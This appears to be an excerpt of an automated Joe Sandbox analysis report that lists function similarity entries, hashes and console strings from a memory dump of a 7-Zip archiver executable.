                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
• API String ID: 1646373207-4044117955
• Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
• Instruction ID: 0b5de85434db08832493908c58d1ce8c222c9dec2535b86158d6799d40af446c
• Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
• Instruction Fuzzy Hash: A6E07E78645A0691EA84DB51FAAC39423A5F769755F904035C82E03320EF3C825AC700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
• Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
• Instruction ID: cab6a0d0ff4427ed73ceb208f1f6475c1c0b45d99dcfa3742254ac5dbf6620c3
• Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
• Instruction Fuzzy Hash: 4F31AA62724E8143DB10EF26D49056D7721ABA6FE4B1C8223FFAE1B799CF39C4028750
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ErrorLast
• String ID:
• API String ID: 408039514-0
• Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
• Instruction ID: 4ed92bf49c23b780adf62ea6353aab59dbcdcbd12f46a158bc8f1a3428166a08
• Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
• Instruction Fuzzy Hash: D131B1232149848BCB30DF25E88026AB760F7D97A4F485126EB9E87B66DF39D855CB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
• Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
• Instruction ID: 591c0579aeeeb229177000d882fd03951e5d79074bdd88848460a58cb4c5d8b3
• Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
• Instruction Fuzzy Hash: 9231BEB2328701A1EF04AF669C593E83361AB55FC8F825851DE0A96347EF74CAE5C304
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
• Instruction ID: fe550b74a41d3e62db3a00954944466c2b38c7db9872bddf7f5c3ef4f4059d9b
• Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
• Instruction Fuzzy Hash: 74012C6325A58085C611FB32E45666E6320F7E3B91F0850A3DF6E53712CF38D447C214
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
• Instruction ID: 54cfbe9d075850a80ac4837eda0f82ad4793ef74a5ba132e4cd3a4f0c3433279
• Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
• Instruction Fuzzy Hash: AE01C96325658045CA11FF36E46176E6320EBE7B91F0990A3EF6E53721CF38D487C628
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
• Instruction ID: f004b11b99ccb02d8f65ed84a923dede1abc6a2103d9fb865be1bebf0f134f3c
• Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
• Instruction Fuzzy Hash: 4C01DA637119848ACA10EF76DC911AC2330ABB6BA871C8572FF2D4B755DF30DC528364
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                • Instruction ID: f4c3600b2a581093f4e985c0ab5111a853831051daeac6bedb4ca78b28116002
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C011A636119808ACB10AE36DC911682730ABB6B98B1C8177FF2E4B755DF70D8428364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C91C
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C9F1
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021CADA
                                                                                                                                                                                                                                  • Part of subcall function 001D22E4: fflush.MSVCRT ref: 001D22EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                • API String ID: 2975459029-4064182643
                                                                                                                                                                                                                                • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                • Instruction ID: 4d0182c510cbb800f57e92d713907cafe06acb2f482defb4906e588c5ba94f8f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86616E6A750686AACA39EF62E5913BE7351F774B80F584026DF6F07B01CF38D8A48350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                                                • API String ID: 1294909896-1476144188
                                                                                                                                                                                                                                • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                • Instruction ID: 324a9a4fe159d0d4f7df4b453f5f8b0281ce098db53b58e7e199b0a5d10353db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12512472220B05A6CF10DF25E84136AB761FBA07A4F84A023EE9747796DF7CC685CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00210E9C
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210F5D
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210FD8
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210FF4
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00211092
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                                                • String ID: ???
                                                                                                                                                                                                                                • API String ID: 2578255354-1053719742
                                                                                                                                                                                                                                • Opcode ID: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                                                                                                                • Instruction ID: 4c069cdc530dfc2e352f693ba38a667a932e43aaf26b971b2185fb99fe66668e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88514D32320A81A2DA58DF26DA953ED6360F768B94F444526DF2D07764DF78D9FAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Would you like to replace the existing file:, xrefs: 00210CF0
                                                                                                                                                                                                                                • with the file from archive:, xrefs: 00210D1C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                                                • API String ID: 3346953513-686978020
                                                                                                                                                                                                                                • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                • Instruction ID: 15b711f9f68e464d3e1e28ddd7a6b3ea1faabedc021875aeaaf3eb4cedf528b5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341136237068291DA289F66E8C03E973A0F7A5B90F4482229F2D07350CFBCD8E8C704
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CriticalSectionfputs$EnterLeavefree
• String ID: :
• API String ID: 1989314732-3653984579
• Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
• Instruction ID: acf192ad0a0c8f18f1d91bb9ff587c9b96a35887a6f91d402a9ccfa430829278
• Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
• Instruction Fuzzy Hash: 6C312C72210A4581DB25DF25D8453DD2370F7A8FA8F585272EE6D4B7A8CF78C899C710
APIs
Strings
• Enter password (will not be echoed):, xrefs: 0021CE69
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ConsoleMode$Handlefflushfputs
• String ID: Enter password (will not be echoed):
• API String ID: 108775803-3720017889
• Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
• Instruction ID: 3af5ed31cb5e8baf654c5492fb3d70631f696bfdd4c9bfe4cb26a3a4fa3c835f
• Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
• Instruction Fuzzy Hash: E3210A2635160242EE149F65E9153B923A1AB78BB0F385232EE2A477E4DF7CC8D6C300
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputsfree
• String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
• API String ID: 2581285248-3393983761
• Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
• Instruction ID: 1073221893fbc514b9d02fc2bc5b28d30d047c469b929c10cb87bac7196ad0d2
• Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
• Instruction Fuzzy Hash: CE218672314A4595CE20EF25E8503DD6760F7A9BE8F484222EF2E47765EF38C696C700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
• Instruction ID: d9ed1f524667c6b4f11cefa248035340aa1ab06e9f2aa5f975abd9d19b73b4e3
• Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
• Instruction Fuzzy Hash: 0A71D12262C7C086CB20DF25E44069EB775F7DA790F648102EB9A43BAACF78D955DB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
• Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
• Instruction ID: ba9752c96330416a3f0d51e8f45dd0a06261f5d1c54a385f7342bbbf7f989a8c
• Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
• Instruction Fuzzy Hash: A141053220C7C881CB35AF29D4902BE7770D7A2B9CF188112EB9A07795DF79D586C301
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: freememmove$ExceptionThrowmalloc
• String ID:
• API String ID: 1818558235-0
• Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
• Instruction ID: 47430fbcc8bafc3bbbe1d3cfe2f65c2549ef4c97995d8a949bf08a67b7f5893c
• Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
• Instruction Fuzzy Hash: 60314DB27112948B8B64DF7AD49242D73E4E768FD83188026DF2D97709DB30DC92CB90
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
• Instruction ID: bb874fbb0eb54c23694450a9c2cd2d11a6675aad7176b1cbf40d3e60180cd939
• Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
• Instruction Fuzzy Hash: 3EF0902225A69081CA10FF32C49562E6730FBF7F80F08A063EB6E63716CF38D406C214
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                • Instruction ID: 333c99c1a3db3880cc2c99477348d234a35b7f2b1c5c790e8df556eb58235f2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F0302225AA8081CA14FF32C4A562F6730F7E3F85F099053EB6E63712CF78D446C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                • Instruction ID: c1e7cc83ac3c1a80b513546c6afd0a15a392b553df3eabc15430867efd5fe35b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF0122225AA8145CA10FF32C85562F6730F7E3F85F095053DB5E63711CF38D406C614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
